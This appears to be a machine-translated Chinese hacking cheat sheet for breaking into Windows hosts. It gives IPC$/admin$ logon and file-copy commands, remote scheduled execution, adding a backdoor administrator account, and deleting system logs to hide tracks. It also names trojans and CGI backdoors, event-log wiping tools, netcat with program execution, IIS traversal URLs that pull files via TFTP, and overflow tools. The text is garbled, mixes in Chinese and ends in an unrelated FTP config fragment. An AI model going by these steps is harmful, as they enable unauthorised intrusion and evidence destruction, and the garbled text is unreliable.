如何通过ip查主机How to check host through IPNbtstat -a 192. 168. 1. 10
Just use this format. 192. 168. 1. 10 is the other party' s IPaddressperhaps
Net view, opposite IP
1. know the other party IP and check the computer name of theother party
Methods: ->cmd->net view IP start > run each other
Or start > run ->cmd->nbtstat IP -a each other
2. know each other' s computer name, check each other' s IPMethods: Start > computer running ->cmd->ping the other nameOr start - > computer running ->cmd->nbtstat -a the other name(establish an ATM connection with the remote host) net use \\IPaddress \ipc$' ' /use""
(log on to the remote host as administrator) net, use, \\IPaddress, \ipc$, password, /use: , Admini strator"
(transfer files to remote host WINNT directory) copy nativedirectory path \ program \\IP address \admin$
(see remote host time) net time \\IP address
(start a program on time) at, \\IP address, 02:18, readme.exe(see shared) net view \\IP address
(see the NetBIOS workgroup list) nbtstat -A IP address(the remote host C mapping for their F net use f: \\IP disk)\c$"/user:" Administrator ""
(these two add themselves to the Admin Group) : net, user, username, password, /add
Net localgroup Administrators user name /add
(disconnect) net, use, \\IP address, \ipc$, /delete
Wipe your ass off:
Del C:\winnt\system32\logfiles\*.*
Del C:\winnt\system32\config\*. evt
Del C:\winnt\system32\dtclog\*.*
Del C:\winnt\system32\*. log
Del C:\winnt\system32\*.txt
Del C:\winnt\*.txt
Del C:\winnt\*. log
One, netsvc.exe
The following commands are listed on the host service project,search and remote start host' s "time task" service:
Netsvc /list \\IP address
Netsvc schedule \\IP address /query
Netsvc \\IP address schedule /start
Two, OpenTelnet. exe
Remotely start the host' s Telnet service andbindports to 7878,for example:
OpenTelnet, \\IP address, user name, password 17878
Then you can telnet to the 7878 port of the host and enter theDOS mode:
Telnet IP address 7878
Three, winshell. exe
A very small Trojan (less than 6K) , telnet to the host' s 7878port, enter the password WINSHELL, when you see CMD>, you cancall the following command:
P Path (see the path information for the WINSHELL main program)B reBoot (restart the machine)
D shutDown (shut down the machine)
S Shell (after execution, you' ll see the lovely "C:\>")X eXit (exits this logon session, and this command does notterminate the operation of WINSHELL)
CMD> http://. . . /srv.exe (downloading f iles from otherwebsites via HTTP to WINSHELL running machines)
Four, 3389 landers, GUI log on the remote host
Five, elsave. exe
Event log Cleanup Tool
Elsave -s \\IP address -l "application" -C
Elsave -s \\IP address -l "system" -C
Elsave -s \\IP address -l "security" -C
Successfully cleared application logs, system logs, andsecurity logs after execution
Six, hbulot.exe
Open 3389 services for win2kserver and WinXP
Hbulot [/r]
Use the /r to automatically reset the target after theinstallation is complete, so that the settings are effective.Seven, nc. exe (netcat. exe)
A good tool, some scripting programs use it, and can do overflowconnections.
Want to connect to somewhere:NC, [-options], hostname, port[s],[ports] . . .
Bound ports waiting for connections: NC, -l, -p, port,[-options] , [hostname] , [port]
-e prog program redirection, once connected, execute
[danger! ! ] !
-g, gateway, source-routing, hop, point[s] , up, to 8
-G, num, source-routing, poi nter: 4, 8, 12, . . .
-h help information
-i secs delay interval
-l listening mode for inbound connections
-n specifies the IP address of the number,
你模式UD P
八、 tftpd32.exe
把自己的电脑临时变为一台FTP服务器让肉鸡来下载文件 TFTP
HTTP / / / / IP地址并255c % % 255c /中/下/ cmd. exe证我本机IP地址tftp得到文件名C \系统\ System32 \文件名
HTTP / / / / IP地址并255c % % 255c /中/下/ cmd.exe / C +文件名
九、prihack. exe是IIS的打印机远程缓冲区溢出工具。idqover.exe是溢出IDQ的选择”溢出后在一个端口监听” 然后用Telnet连接它的监听端口如果溢出成功一连它的端口绑定的命令马上执行。 xploit . exe是一个图形界面的IDA溢出成功以后WinXP下需要打WinXP。
一○、 NTIS .exe、 cmd. exe和cmdasp。 ASP是三个CGI后门 EXE要放到目录下CGIASP放到有执行权限的目录然后用IE浏览器连接ASP。
一、一XS CAN命令行运行参数说明
在检测过程中按” [空格] “键可以查看各线程状态及扫描进度按
1。命令格式 XSCAN主机[ ] [其他选项]
X S CAN文件[其他选项]
端口检测常用服务的端口状态可通过\数据\配置INI文件的” port-scan-options \ port-list”项定制待检测端口列表FTP检测FTP弱口令可通过\数据\配置I NI文件设置用户名/密码字典文件
- ntpass检测NT服务器弱口令可通过\数据\配置INI文件设置用户名/密码字典文件
CGI检测CGI漏洞可通过\数据\配置INI文件的” cgi-encode \encode_type”项设置编码方案
IIS检测IIS漏洞可通过\数据\配置INI文件的” cgi-encode \encode_type”项设置编码方案
T指定最大并发线程数量和并发主机数量默认数量为100chown_uploadschown_uploads =没有
# chown_us ername =谁chroot_local_user =是的
#用户不chroot() 。
# chroot_l ist_enable =是的chroot_l ist_enab le =没有
# 默认如下
# chroot_list_file = / etc /命令/ chroot_list
#可以激活“R”选项 内置LS。这是禁用的
#默认为避免远程用户能够导致过度的I / O大
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